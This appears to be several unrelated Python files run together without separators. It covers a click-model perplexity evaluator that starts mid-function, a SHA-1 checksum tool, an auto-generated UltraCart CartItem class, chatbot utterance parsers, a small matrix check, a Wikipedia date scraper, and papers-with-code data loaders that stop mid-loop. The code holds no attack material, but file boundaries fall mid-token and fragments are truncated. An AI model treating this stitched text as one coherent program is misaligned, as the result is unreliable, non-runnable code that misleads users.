TOTAL_RANKS # bar = progressbar.ProgressBar(maxval=NUM_SERPS, # widgets=[progressbar.Bar('=', '[', ']'), ' ', # progressbar.Counter()]) for s in range(NUM_SERPS): #print s data = batch_X[s] data = np.reshape(data, (1, 10, batch_X.shape[2])) labels = batch_y[s] data_m = np.tile(data.copy(), [512,1,1]) data_m[:,:,-1] = lst probability = np.reshape(lstmnn.model.predict_proba(data_m, verbose=0).T, [10,512]) probs = [[],[]] probs[0] = 1.0 - probability probs[1] = probability ppr = [0.] * TOTAL_RANKS for i in xrange(TOTAL_RANKS): if i == 0: label = int(labels[i]) inter = np.zeros([2]) inter[0] = probs[0][0,i] inter[1] = probs[1][0,i] ppr[i] = inter[label] prev_inter = inter.copy() else: label = int(labels[i]) dims = [2] * (i + 1) inter = np.zeros(dims) c = 0.0 for idx in [list(reversed(l)) for l in list(itertools.product([0, 1], repeat=i+1))]: inter[tuple(idx)] = probs[idx[0]][i, int(c)] * prev_inter[tuple(idx[1:])] c += 0.5 ppr[i] = float(label) * np.sum(inter[1]) + float(1-label) * np.sum(inter[0]) prev_inter = inter.copy() for rank, click_prob in enumerate(ppr): perplexity_at_rank[rank] += math.log(click_prob, 2) perplexity_at_rank = [2 ** (-x / NUM_SERPS) for x in perplexity_at_rank] perplexity = sum(perplexity_at_rank) / len(perplexity_at_rank) return perplexity, perplexity_at_rank if __name__ == "__main__": evaluator = ConditionalPerplexity() data_dir = "../data/sparse_matrix_set1_train_0-500000.pickle/" lstmnn_init = lstm.LSTMNN() lstmnn_init.create_model() batch_itr = lstmnn_init.get_batch_pickle(data_dir) for step, (batch_X, batch_y) in enumerate(batch_itr): evaluator.evaluate(batch_X, batch_y) break """Generates checksums for every file within a directory (recursively), displaying those checksums through stdout. Created to provide an example of how to use the fileprocessor module. """ import sys import hashlib from fileprocessor import FileProcessor, searchers, filterers, extractors class ChecksumGenerator(extractors.ByteStreamExtractor): """Generates """ def __init__(self, blockSize = 65536): """Construct instance of ChecksumGenerator. Keyword arguments: blockSize -- Amount of data to read it at once when generating checksum. Should be fairly low if the machine does not have much memory. (default: 65536) """ self.blockSize = blockSize def extractFromStream(self, data): """Generate and reutrn SHA-1 checksum from stream of byte data. Arguments: data -- Byte stream containing data to generate checksum for """ hasher = hashlib.sha1() buff = data.read(self.blockSize) while len(buff) > 0: hasher.update(buff) buff = data.read(self.blockSize) return hasher.hexdigest() def main(directoriesToSearch): """Run checksum generation process. Arguments: directoriesToSearch -- List containing all of the directories containing files to generate checksums for """ # Build components to use for file processor searcher = searchers.FileSearcher(True) extractor = ChecksumGenerator() processor = FileProcessor(searcher, [], extractor) # Perofrm checksum generation and display every checksum generatedChecksums = processor.process(directoriesToSearch) for filename, checksum in generatedChecksums.items(): print("{}\n\t{}".format(filename, checksum)) if __name__ == "__main__": # Parse command line arguments if len(sys.argv) < 3: sys.exit("Usage: python {} {{-d }}".format(sys.argv[0])) directoriesToSearch = [] # store all directories requesed for i in range(1, len(sys.argv)): if sys.argv[i] == "-d" and i < (len(sys.argv) - 1): i += 1 # go to next argumnet, the actual directory directoriesToSearch.append( sys.argv[i] ) if len(directoriesToSearch) == 0: sys.exit("No directories to search specified") main(directoriesToSearch)# coding: utf-8 """ UltraCart Rest API V2 UltraCart REST API Version 2 OpenAPI spec version: 2.0.0 Contact: Generated by: https://github.com/swagger-api/swagger-codegen.git """ from pprint import pformat from six import iteritems import re class CartItem(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'arbitrary_unit_cost': 'Currency', 'attributes': 'list[CartItemAttribute]', 'auto_order_schedule': 'str', 'default_image_url': 'str', 'default_thumbnail_url': 'str', 'description': 'str', 'discount': 'Currency', 'extended_description': 'str', 'item_id': 'str', 'item_oid': 'int', 'kit': 'bool', 'kit_component_options': 'list[CartKitComponentOption]', 'manufacturer_suggested_retail_price': 'Currency', 'maximum_quantity': 'float', 'minimum_quantity': 'float', 'multimedia': 'list[CartItemMultimedia]', 'options': 'list[CartItemOption]', 'phsyical': 'CartItemPhysical', 'position': 'int', 'preorder': 'bool', 'quantity': 'float', 'schedules': 'list[str]', 'total_cost': 'Currency', 'total_cost_with_discount': 'Currency', 'unit_cost': 'Currency', 'unit_cost_with_discount': 'Currency', 'upsell': 'bool', 'variations': 'list[CartItemVariationSelection]', 'view_url': 'str' } attribute_map = { 'arbitrary_unit_cost': 'arbitrary_unit_cost', 'attributes': 'attributes', 'auto_order_schedule': 'auto_order_schedule', 'default_image_url': 'default_image_url', 'default_thumbnail_url': 'default_thumbnail_url', 'description': 'description', 'discount': 'discount', 'extended_description': 'extended_description', 'item_id': 'item_id', 'item_oid': 'item_oid', 'kit': 'kit', 'kit_component_options': 'kit_component_options', 'manufacturer_suggested_retail_price': 'manufacturer_suggested_retail_price', 'maximum_quantity': 'maximum_quantity', 'minimum_quantity': 'minimum_quantity', 'multimedia': 'multimedia', 'options': 'options', 'phsyical': 'phsyical', 'position': 'position', 'preorder': 'preorder', 'quantity': 'quantity', 'schedules': 'schedules', 'total_cost': 'total_cost', 'total_cost_with_discount': 'total_cost_with_discount', 'unit_cost': 'unit_cost', 'unit_cost_with_discount': 'unit_cost_with_discount', 'upsell': 'upsell', 'variations': 'variations', 'view_url': 'view_url' } def __init__(self, arbitrary_unit_cost=None, attributes=None, auto_order_schedule=None, default_image_url=None, default_thumbnail_url=None, description=None, discount=None, extended_description=None, item_id=None, item_oid=None, kit=None, kit_component_options=None, manufacturer_suggested_retail_price=None, maximum_quantity=None, minimum_quantity=None, multimedia=None, options=None, phsyical=None, position=None, preorder=None, quantity=None, schedules=None, total_cost=None, total_cost_with_discount=None, unit_cost=None, unit_cost_with_discount=None, upsell=None, variations=None, view_url=None): """ CartItem - a model defined in Swagger """ self._arbitrary_unit_cost = None self._attributes = None self._auto_order_schedule = None self._default_image_url = None self._default_thumbnail_url = None self._description = None self._discount = None self._extended_description = None self._item_id = None self._item_oid = None self._kit = None self._kit_component_options = None self._manufacturer_suggested_retail_price = None self._maximum_quantity = None self._minimum_quantity = None self._multimedia = None self._options = None self._phsyical = None self._position = None self._preorder = None self._quantity = None self._schedules = None self._total_cost = None self._total_cost_with_discount = None self._unit_cost = None self._unit_cost_with_discount = None self._upsell = None self._variations = None self._view_url = None self.discriminator = None if arbitrary_unit_cost is not None: self.arbitrary_unit_cost = arbitrary_unit_cost if attributes is not None: self.attributes = attributes if auto_order_schedule is not None: self.auto_order_schedule = auto_order_schedule if default_image_url is not None: self.default_image_url = default_image_url if default_thumbnail_url is not None: self.default_thumbnail_url = default_thumbnail_url if description is not None: self.description = description if discount is not None: self.discount = discount if extended_description is not None: self.extended_description = extended_description if item_id is not None: self.item_id = item_id if item_oid is not None: self.item_oid = item_oid if kit is not None: self.kit = kit if kit_component_options is not None: self.kit_component_options = kit_component_options if manufacturer_suggested_retail_price is not None: self.manufacturer_suggested_retail_price = manufacturer_suggested_retail_price if maximum_quantity is not None: self.maximum_quantity = maximum_quantity if minimum_quantity is not None: self.minimum_quantity = minimum_quantity if multimedia is not None: self.multimedia = multimedia if options is not None: self.options = options if phsyical is not None: self.phsyical = phsyical if position is not None: self.position = position if preorder is not None: self.preorder = preorder if quantity is not None: self.quantity = quantity if schedules is not None: self.schedules = schedules if total_cost is not None: self.total_cost = total_cost if total_cost_with_discount is not None: self.total_cost_with_discount = total_cost_with_discount if unit_cost is not None: self.unit_cost = unit_cost if unit_cost_with_discount is not None: self.unit_cost_with_discount = unit_cost_with_discount if upsell is not None: self.upsell = upsell if variations is not None: self.variations = variations if view_url is not None: self.view_url = view_url @property def arbitrary_unit_cost(self): """ Gets the arbitrary_unit_cost of this CartItem. :return: The arbitrary_unit_cost of this CartItem. :rtype: Currency """ return self._arbitrary_unit_cost @arbitrary_unit_cost.setter def arbitrary_unit_cost(self, arbitrary_unit_cost): """ Sets the arbitrary_unit_cost of this CartItem. :param arbitrary_unit_cost: The arbitrary_unit_cost of this CartItem. :type: Currency """ self._arbitrary_unit_cost = arbitrary_unit_cost @property def attributes(self): """ Gets the attributes of this CartItem. Attributes :return: The attributes of this CartItem. :rtype: list[CartItemAttribute] """ return self._attributes @attributes.setter def attributes(self, attributes): """ Sets the attributes of this CartItem. Attributes :param attributes: The attributes of this CartItem. :type: list[CartItemAttribute] """ self._attributes = attributes @property def auto_order_schedule(self): """ Gets the auto_order_schedule of this CartItem. Auto order schedule the customer selected :return: The auto_order_schedule of this CartItem. :rtype: str """ return self._auto_order_schedule @auto_order_schedule.setter def auto_order_schedule(self, auto_order_schedule): """ Sets the auto_order_schedule of this CartItem. Auto order schedule the customer selected :param auto_order_schedule: The auto_order_schedule of this CartItem. :type: str """ self._auto_order_schedule = auto_order_schedule @property def default_image_url(self): """ Gets the default_image_url of this CartItem. URL to the default multimedia image :return: The default_image_url of this CartItem. :rtype: str """ return self._default_image_url @default_image_url.setter def default_image_url(self, default_image_url): """ Sets the default_image_url of this CartItem. URL to the default multimedia image :param default_image_url: The default_image_url of this CartItem. :type: str """ self._default_image_url = default_image_url @property def default_thumbnail_url(self): """ Gets the default_thumbnail_url of this CartItem. URL to the default multimedia thumbnail :return: The default_thumbnail_url of this CartItem. :rtype: str """ return self._default_thumbnail_url @default_thumbnail_url.setter def default_thumbnail_url(self, default_thumbnail_url): """ Sets the default_thumbnail_url of this CartItem. URL to the default multimedia thumbnail :param default_thumbnail_url: The default_thumbnail_url of this CartItem. :type: str """ self._default_thumbnail_url = default_thumbnail_url @property def description(self): """ Gets the description of this CartItem. Description of the item :return: The description of this CartItem. :rtype: str """ return self._description @description.setter def description(self, description): """ Sets the description of this CartItem. Description of the item :param description: The description of this CartItem. :type: str """ self._description = description @property def discount(self): """ Gets the discount of this CartItem. :return: The discount of this CartItem. :rtype: Currency """ return self._discount @discount.setter def discount(self, discount): """ Sets the discount of this CartItem. :param discount: The discount of this CartItem. :type: Currency """ self._discount = discount @property def extended_description(self): """ Gets the extended_description of this CartItem. Extended description of the item :return: The extended_description of this CartItem. :rtype: str """ return self._extended_description @extended_description.setter def extended_description(self, extended_description): """ Sets the extended_description of this CartItem. Extended description of the item :param extended_description: The extended_description of this CartItem. :type: str """ self._extended_description = extended_description @property def item_id(self): """ Gets the item_id of this CartItem. Item ID :return: The item_id of this CartItem. :rtype: str """ return self._item_id @item_id.setter def item_id(self, item_id): """ Sets the item_id of this CartItem. Item ID :param item_id: The item_id of this CartItem. :type: str """ self._item_id = item_id @property def item_oid(self): """ Gets the item_oid of this CartItem. Item object identifier :return: The item_oid of this CartItem. :rtype: int """ return self._item_oid @item_oid.setter def item_oid(self, item_oid): """ Sets the item_oid of this CartItem. Item object identifier :param item_oid: The item_oid of this CartItem. :type: int """ self._item_oid = item_oid @property def kit(self): """ Gets the kit of this CartItem. True if this item is a kit :return: The kit of this CartItem. :rtype: bool """ return self._kit @kit.setter def kit(self, kit): """ Sets the kit of this CartItem. True if this item is a kit :param kit: The kit of this CartItem. :type: bool """ self._kit = kit @property def kit_component_options(self): """ Gets the kit_component_options of this CartItem. Options associated with the kit components :return: The kit_component_options of this CartItem. :rtype: list[CartKitComponentOption] """ return self._kit_component_options @kit_component_options.setter def kit_component_options(self, kit_component_options): """ Sets the kit_component_options of this CartItem. Options associated with the kit components :param kit_component_options: The kit_component_options of this CartItem. :type: list[CartKitComponentOption] """ self._kit_component_options = kit_component_options @property def manufacturer_suggested_retail_price(self): """ Gets the manufacturer_suggested_retail_price of this CartItem. :return: The manufacturer_suggested_retail_price of this CartItem. :rtype: Currency """ return self._manufacturer_suggested_retail_price @manufacturer_suggested_retail_price.setter def manufacturer_suggested_retail_price(self, manufacturer_suggested_retail_price): """ Sets the manufacturer_suggested_retail_price of this CartItem. :param manufacturer_suggested_retail_price: The manufacturer_suggested_retail_price of this CartItem. :type: Currency """ self._manufacturer_suggested_retail_price = manufacturer_suggested_retail_price @property def maximum_quantity(self): """ Gets the maximum_quantity of this CartItem. Maximum quantity the customer can purchase :return: The maximum_quantity of this CartItem. :rtype: float """ return self._maximum_quantity @maximum_quantity.setter def maximum_quantity(self, maximum_quantity): """ Sets the maximum_quantity of this CartItem. Maximum quantity the customer can purchase :param maximum_quantity: The maximum_quantity of this CartItem. :type: float """ self._maximum_quantity = maximum_quantity @property def minimum_quantity(self): """ Gets the minimum_quantity of this CartItem. Minimum quantity the customer can purchase :return: The minimum_quantity of this CartItem. :rtype: float """ return self._minimum_quantity @minimum_quantity.setter def minimum_quantity(self, minimum_quantity): """ Sets the minimum_quantity of this CartItem. Minimum quantity the customer can purchase :param minimum_quantity: The minimum_quantity of this CartItem. :type: float """ self._minimum_quantity = minimum_quantity @property def multimedia(self): """ Gets the multimedia of this CartItem. Multimedia :return: The multimedia of this CartItem. :rtype: list[CartItemMultimedia] """ return self._multimedia @multimedia.setter def multimedia(self, multimedia): """ Sets the multimedia of this CartItem. Multimedia :param multimedia: The multimedia of this CartItem. :type: list[CartItemMultimedia] """ self._multimedia = multimedia @property def options(self): """ Gets the options of this CartItem. Options :return: The options of this CartItem. :rtype: list[CartItemOption] """ return self._options @options.setter def options(self, options): """ Sets the options of this CartItem. Options :param options: The options of this CartItem. :type: list[CartItemOption] """ self._options = options @property def phsyical(self): """ Gets the phsyical of this CartItem. :return: The phsyical of this CartItem. :rtype: CartItemPhysical """ return self._phsyical @phsyical.setter def phsyical(self, phsyical): """ Sets the phsyical of this CartItem. :param phsyical: The phsyical of this CartItem. :type: CartItemPhysical """ self._phsyical = phsyical @property def position(self): """ Gets the position of this CartItem. Position of the item in the cart :return: The position of this CartItem. :rtype: int """ return self._position @position.setter def position(self, position): """ Sets the position of this CartItem. Position of the item in the cart :param position: The position of this CartItem. :type: int """ self._position = position @property def preorder(self): """ Gets the preorder of this CartItem. True if this item is on pre-order :return: The preorder of this CartItem. :rtype: bool """ return self._preorder @preorder.setter def preorder(self, preorder): """ Sets the preorder of this CartItem. True if this item is on pre-order :param preorder: The preorder of this CartItem. :type: bool """ self._preorder = preorder @property def quantity(self): """ Gets the quantity of this CartItem. quantity :return: The quantity of this CartItem. :rtype: float """ return self._quantity @quantity.setter def quantity(self, quantity): """ Sets the quantity of this CartItem. quantity :param quantity: The quantity of this CartItem. :type: float """ self._quantity = quantity @property def schedules(self): """ Gets the schedules of this CartItem. Customer selectable auto order schedules :return: The schedules of this CartItem. :rtype: list[str] """ return self._schedules @schedules.setter def schedules(self, schedules): """ Sets the schedules of this CartItem. Customer selectable auto order schedules :param schedules: The schedules of this CartItem. :type: list[str] """ self._schedules = schedules @property def total_cost(self): """ Gets the total_cost of this CartItem. :return: The total_cost of this CartItem. :rtype: Currency """ return self._total_cost @total_cost.setter def total_cost(self, total_cost): """ Sets the total_cost of this CartItem. :param total_cost: The total_cost of this CartItem. :type: Currency """ self._total_cost = total_cost @property def total_cost_with_discount(self): """ Gets the total_cost_with_discount of this CartItem. :return: The total_cost_with_discount of this CartItem. :rtype: Currency """ return self._total_cost_with_discount @total_cost_with_discount.setter def total_cost_with_discount(self, total_cost_with_discount): """ Sets the total_cost_with_discount of this CartItem. :param total_cost_with_discount: The total_cost_with_discount of this CartItem. :type: Currency """ self._total_cost_with_discount = total_cost_with_discount @property def unit_cost(self): """ Gets the unit_cost of this CartItem. :return: The unit_cost of this CartItem. :rtype: Currency """ return self._unit_cost @unit_cost.setter def unit_cost(self, unit_cost): """ Sets the unit_cost of this CartItem. :param unit_cost: The unit_cost of this CartItem. :type: Currency """ self._unit_cost = unit_cost @property def unit_cost_with_discount(self): """ Gets the unit_cost_with_discount of this CartItem. :return: The unit_cost_with_discount of this CartItem. :rtype: Currency """ return self._unit_cost_with_discount @unit_cost_with_discount.setter def unit_cost_with_discount(self, unit_cost_with_discount): """ Sets the unit_cost_with_discount of this CartItem. :param unit_cost_with_discount: The unit_cost_with_discount of this CartItem. :type: Currency """ self._unit_cost_with_discount = unit_cost_with_discount @property def upsell(self): """ Gets the upsell of this CartItem. True if this item was added to the cart as part of an upsell :return: The upsell of this CartItem. :rtype: bool """ return self._upsell @upsell.setter def upsell(self, upsell): """ Sets the upsell of this CartItem. True if this item was added to the cart as part of an upsell :param upsell: The upsell of this CartItem. :type: bool """ self._upsell = upsell @property def variations(self): """ Gets the variations of this CartItem. Variations :return: The variations of this CartItem. :rtype: list[CartItemVariationSelection] """ return self._variations @variations.setter def variations(self, variations): """ Sets the variations of this CartItem. Variations :param variations: The variations of this CartItem. :type: list[CartItemVariationSelection] """ self._variations = variations @property def view_url(self): """ Gets the view_url of this CartItem. URL to view the product on the site :return: The view_url of this CartItem. :rtype: str """ return self._view_url @view_url.setter def view_url(self, view_url): """ Sets the view_url of this CartItem. URL to view the product on the site :param view_url: The view_url of this CartItem. :type: str """ self._view_url = view_url def to_dict(self): """ Returns the model properties as a dict """ result = {} for attr, _ in iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """ Returns the string representation of the model """ return pformat(self.to_dict()) def __repr__(self): """ For `print` and `pprint` """ return self.to_str() def __eq__(self, other): """ Returns true if both objects are equal """ if not isinstance(other, CartItem): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """ Returns true if both objects are not equal """ return not self == other import datetime import functools import re from typing import Callable, Iterable, Tuple, Union, cast import dateparser import gamla import inflect import number_parser import phonenumbers import pyap import spacy import agenda _nlp = spacy.load("en_core_web_lg") @functools.cache def _cached_inflect_engine(): return inflect.engine() def _remove_punctuation(text: str) -> str: return re.sub(r"[.,!?;]", "", text) def _analyze(text: str): return _nlp(text) _AFFIRMATIVE = { "affirmative", "agree", "cool", "definitely", "good", "i did", "i do", "i had", "i have", "i think so", "i believe so", "obviously", "of course", "ok", "proceed", "right", "sure", "that's great", "yeah", "yes", "yup", } _NEGATIVE = { "definitely not", "didn't", "don't", "have not", "i don't think so", "i have not", "i haven't", "nah", "negative", "negatory", "no", "nope", "not", "nothing", "of course not", "i disagree", "disagree", } @functools.cache def _singular_noun(word: str) -> str: return _cached_inflect_engine().singular_noun(word) or word @functools.cache def _plural_noun(word: str) -> str: if _cached_inflect_engine().singular_noun(word): return word return _cached_inflect_engine().plural_noun(word, count=None) _singularize_or_pluralize_words: Callable[ [Iterable[str]], Tuple[str, ...] ] = gamla.compose_left( gamla.juxtcat( gamla.compose_left(gamla.map(_singular_noun), frozenset), gamla.compose_left(gamla.map(_plural_noun), frozenset), ), tuple, ) def _sentences_similarity(user_utterance: str, examples: Tuple[str, ...]) -> float: user_sentence = _analyze(user_utterance) return gamla.pipe( examples, gamla.map( gamla.compose_left( _analyze, lambda sentence: sentence.similarity(user_sentence) ) ), gamla.sort, gamla.last, ) _text_to_lower_case_words: Callable[[str], Iterable[str]] = gamla.compose_left( lambda text: re.findall(r"[\w']+|[.,!?;]", text.lower()) ) _text_to_ngram_text: Callable[[str], Tuple[str]] = gamla.compose_left( _text_to_lower_case_words, gamla.get_all_n_grams, gamla.map(" ".join), tuple ) def faq_score(question: str, user_utternace: str) -> float: return gamla.pipe( user_utternace, _analyze, lambda sentence: sentence.similarity(_analyze(question)), ) email: Callable[[str], str] = gamla.compose_left( _analyze, gamla.filter(gamla.attrgetter("like_email")), gamla.map(gamla.attrgetter("text")), tuple, gamla.ternary(gamla.nonempty, gamla.head, gamla.just(agenda.UNKNOWN)), ) phone: Callable[[str], str] = gamla.compose_left( lambda text: phonenumbers.PhoneNumberMatcher( text, "US", leniency=phonenumbers.Leniency.POSSIBLE ), gamla.map( lambda match: phonenumbers.format_number( match.number, phonenumbers.PhoneNumberFormat.NATIONAL ) ), tuple, gamla.ternary(gamla.identity, gamla.head, gamla.just(agenda.UNKNOWN)), ) person_name: Callable[[str], str] = gamla.compose_left( _remove_punctuation, _analyze, gamla.filter( gamla.compose_left(gamla.attrgetter("ent_type_"), gamla.equals("PERSON")) ), gamla.map(gamla.attrgetter("text")), " ".join, gamla.when(gamla.equals(""), gamla.just(agenda.UNKNOWN)), ) person_name_less_strict: Callable[[str], str] = gamla.compose_left( _remove_punctuation, _analyze, gamla.filter(gamla.compose_left(gamla.attrgetter("pos_"), gamla.equals("PROPN"))), gamla.map(gamla.attrgetter("text")), " ".join, gamla.when(gamla.equals(""), gamla.just(agenda.UNKNOWN)), ) address: Callable[[str], str] = gamla.compose_left( lambda user_utterance: pyap.parse(user_utterance, country="US"), gamla.ternary( gamla.nonempty, gamla.compose_left(gamla.head, gamla.attrgetter("full_address")), gamla.just(agenda.UNKNOWN), ), ) def intent(examples: Tuple[str, ...]) -> Callable[[str], bool]: def parse_bool(user_utterance: str): return bool(examples) and _sentences_similarity(user_utterance, examples) >= 0.9 return parse_bool def yes_no(user_utterance: str): if gamla.pipe( user_utterance, _text_to_lower_case_words, gamla.anymap(gamla.contains(_AFFIRMATIVE)), ): return True if gamla.pipe( user_utterance, _text_to_lower_case_words, gamla.anymap(gamla.contains(_NEGATIVE)), ): return False return agenda.UNKNOWN def multiple_choices( options: Tuple[str, ...] ) -> Callable[[str], Tuple[str, agenda.Unknown]]: return gamla.compose_left( _text_to_ngram_text, gamla.filter( gamla.contains([*_singularize_or_pluralize_words(options), "none"]) ), tuple, gamla.when(gamla.empty, gamla.just(agenda.UNKNOWN)), gamla.when( gamla.alljuxt( gamla.is_instance(tuple), gamla.len_equals(1), gamla.compose_left(gamla.head, gamla.equals("none")), ), gamla.just(()), ), ) _single_timeslot_or_unknown = gamla.ternary( gamla.len_equals(1), gamla.compose_left(gamla.head, gamla.apply_method("isoformat")), gamla.just(agenda.UNKNOWN), ) def datetime_choice(options, relative_to): def extract_datetime_choice(user_utterance: str) -> Union[str, agenda.Unknown]: d = future_date(relative_to, user_utterance) t = time(relative_to, user_utterance) if agenda.UNKNOWN not in (d, t): choice = datetime.datetime.combine( cast(datetime.date, d), cast(datetime.time, t) ) return choice.isoformat() if choice in options else agenda.UNKNOWN if d is not agenda.UNKNOWN: return gamla.pipe( options, gamla.filter(lambda o: o.date() == cast(datetime.date, d)), tuple, _single_timeslot_or_unknown, ) if t is not agenda.UNKNOWN: return gamla.pipe( options, gamla.filter(lambda o: o.time().hour == cast(datetime.time, t).hour), tuple, _single_timeslot_or_unknown, ) return agenda.UNKNOWN return extract_datetime_choice def single_choice(options: Tuple[str, ...]) -> Callable[[str], str]: return gamla.compose_left( _text_to_ngram_text, gamla.filter(gamla.contains(_singularize_or_pluralize_words(options))), tuple, gamla.ternary(gamla.len_equals(1), gamla.head, gamla.just(agenda.UNKNOWN)), ) amount = gamla.compose_left( _remove_punctuation, _text_to_lower_case_words, gamla.map(number_parser.parse_number), gamla.remove(gamla.equals(None)), tuple, gamla.ternary(gamla.nonempty, gamla.head, gamla.just(agenda.UNKNOWN)), ) def amount_of(noun: str): analyzed_noun = _analyze(noun) def amount_of(user_utterance): return gamla.pipe( user_utterance, _remove_punctuation, number_parser.parse, _analyze, gamla.filter(lambda t: t.similarity(analyzed_noun) > 0.5), gamla.mapcat(gamla.attrgetter("children")), gamla.filter( gamla.compose_left(gamla.attrgetter("dep_"), gamla.equals("nummod")) ), gamla.map(gamla.attrgetter("text")), tuple, gamla.ternary( gamla.len_greater(0), gamla.compose_left(gamla.head, number_parser.parse_number), gamla.just(agenda.UNKNOWN), ), ) return amount_of def _parse_datetime(relative_to): def parse_datetime(date_str): return dateparser.parse( date_str, settings={ "RELATIVE_BASE": relative_to, "PREFER_DATES_FROM": "future", "TIMEZONE": "UTC", }, ) return parse_datetime def _entities_of_type(date): return gamla.compose_left( _analyze, gamla.attrgetter("ents"), gamla.filter( gamla.compose_left(gamla.attrgetter("label_"), gamla.equals(date)) ), ) def future_date( relative_to: datetime.datetime, user_utterance ) -> Union[datetime.date, agenda.Unknown]: return gamla.pipe( user_utterance, _entities_of_type("DATE"), gamla.map( gamla.compose_left(gamla.attrgetter("text"), _parse_datetime(relative_to)) ), gamla.filter(gamla.identity), gamla.excepts( StopIteration, gamla.just(agenda.UNKNOWN), gamla.compose_left(gamla.head, gamla.apply_method("date")), ), ) def time( relative_to: datetime.datetime, user_utterance ) -> Union[datetime.time, agenda.Unknown]: return gamla.pipe( user_utterance, _entities_of_type("TIME"), gamla.map( gamla.compose_left(gamla.attrgetter("text"), _parse_datetime(relative_to)) ), gamla.filter(gamla.identity), gamla.excepts( StopIteration, gamla.just(agenda.UNKNOWN), gamla.compose_left(gamla.head, gamla.apply_method("time")), ), ) def checkio(matrix): for i in range(len(matrix)): for j in range(len(matrix)): if matrix[i][j]!=-matrix[j][i]: return False return Truescrapers/wikipedia_dates.py import calendar import re import time import sqlite3 import requests from bs4 import BeautifulSoup from tqdm import tqdm def generate_days(year=2020): month_length = [] months = list(calendar.month_name)[1:] for i, month in enumerate(months): days = calendar.monthrange(year, i+1)[1] month_length.append((month, days)) month_and_days = [] for month, days in month_length: for day in range(1, days + 1): month_and_days.append((month, str(day))) strings = ['_'.join(mad) for mad in month_and_days] return strings def scrape_date(date): day, month = date.split('_') html = requests.get(f'http://en.wikipedia.org/wiki/{date}').text m = re.search(r'Events.*?Births', html, re.DOTALL) s = m.start() e = m.end() - len('Births') soup = BeautifulSoup(html[s:e]) li = soup.find_all('li') events = [f'{day} {month}, {l.text}' for l in li] return events def scrape_all(): days = generate_days(2020) events = [] for date in tqdm(days): e = scrape_date(date) events.extend(e) time.sleep(0.5) return events if __name__ == '__main__': events = scrape_all() # transform x = events.copy() x = [xi.split(' – ', 1) for xi in x] x = [xi for xi in x if len(xi) == 2] items = [(xi[0].strip(), xi[1].strip()) for xi in x] # load con = sqlite3.connect('data/categories.db') c = con.cursor() c.execute('CREATE TABLE dates (prompt TEXT, answer TEXT, flag INT)') c.executemany('INSERT INTO dates VALUES (?,?,0)', items) con.commit() con.close() # Data getters import datetime import gzip import json import logging import os import numpy as np import pandas as pd from ai_papers_with_code import PROJECT_DIR DATA_PATH = f"{PROJECT_DIR}/inputs/data" # Papers with code scripts def make_year(x): """Extracts year from a datetime.datetime object""" return x.year if pd.isnull(x) is False else np.nan def read_parse(file_name): """Reads, decompresses and parses a pwc file""" with gzip.open(f"{DATA_PATH}/{file_name}", "rb") as f: file_content = f.read() return json.loads(file_content) def parse_date_string(x, _format="%Y-%m-%d"): return ( datetime.datetime.strptime(x, "%Y-%m-%d") if pd.isnull(x) is False else np.nan ) def make_month_year(x): return datetime.datetime(x.year, x.month, 1) if pd.isnull(x) is False else np.nan def make_empty_list_na(df, variables): """Remove empty lists with np.nans in a dataframe""" df_ = df.copy() for v in variables: df_[v] = df[v].apply(lambda x: x if len(x) > 0 else np.nan) return df_ def get_pwc_papers(): """Get papers table""" # Read and parse the data paper_json = read_parse("papers-with-abstracts.json.gz") # Fix missing values paper_df = pd.DataFrame(paper_json) paper_df_clean = make_empty_list_na(paper_df, ["tasks", "methods"]).replace( {None: np.nan, "": np.nan} ) paper_df_clean["date"] = paper_df_clean["date"].apply( lambda x: parse_date_string(x) ) paper_df_clean["month_year"] = paper_df_clean["date"].apply( lambda x: make_month_year(x) ) paper_df_clean["year"] = paper_df_clean["date"].apply(lambda x: make_year(x)) return paper_df_clean def get_pwc_code_lookup(): """Get papers to code lookup""" paper_code_table = read_parse("links-between-papers-and-code.json.gz") pc_df = pd.DataFrame(paper_code_table).replace({None: np.nan}) return pc_df def get_pwc_methods(): """Get methods""" method_json = read_parse("methods.json.gz") method_df = pd.DataFrame(method_json).replace({None: np.nan}) return method_df def get_pwc_data(): """Get data""" data_json = read_parse("datasets.json.gz") data_df = pd.DataFrame(data_json) data_df_clean = make_empty_list_na( data_df, ["languages", "tasks", "modalities", "data_loaders"] ).replace({None: np.nan}) data_df_clean["date"] = data_df_clean["introduced_date"].apply( lambda x: parse_date_string(x) ) data_df_clean["month_year"] = data_df_clean["date"].apply( lambda x: make_month_year(x) ) data_df_clean["year"] = data_df_clean["date"].apply(lambda x: make_year(x)) return data_df_clean # arXiv scripts def add_author(art_data, art, org="deepmind"): """Adds a new institutional author to an article list of contributing institutes""" if org == "deepmind": values = [ art, "extra_deepmind", np.nan, np.nan, "extra_deepmind", "DeepMind", np.nan, np.nan, "London", "United Kingdom", "GB", "Company", "UKI", "UKI3", "UKI32", ] else: values = [ art, "extra_openai", np.nan, np.nan, "extra_openai", "OpenAI", np.nan, np.nan, "San Francisco", "USA", "US", "Not-profit", np.nan, np.nan, np.nan, ] return art_data.append(pd.Series(values, index=art_data.columns), ignore_index=True) def make_institute_article_table(): """Processes the institute data to incorporate deepmind and openai""" institute = pd.read_csv( f"{PROJECT_DIR}/inputs/data/arxiv_institutes.csv", dtype={"article_id": str} ) # We want one article x institution institute["name"] = institute["name"].apply(lambda x: x.split(" (")[0].strip()) institute_deduped = institute.drop_duplicates(["article_id", "name"]) with open(f"{PROJECT_DIR}/inputs/data/scraped_arxiv_ids.json", "r") as infile: arxiv_ids = json.load(infile) dm_papers = set( [key.split("/")[-1] for key, value in arxiv_ids.items() if value == "DeepMind"] ) oai_papers = set( [key.split("/")[-1] for key, value in arxiv_ids.items() if value == "OpenAI"] ) logging.info("Updating deepmind") institute_dm = institute_deduped.loc[ institute_deduped["article_id"].isin(dm_papers) ] revised_rows = [] # We loop over articles. If there is a google author we replace it with deepmind, otherwise we add deepmind for _id in set(institute_dm["article_id"]): art_data = institute_dm.query(f"article_id == '{_id}'") if "Google" in list(art_data["name"]): art_data_ = art_data.query("name!='Google'") 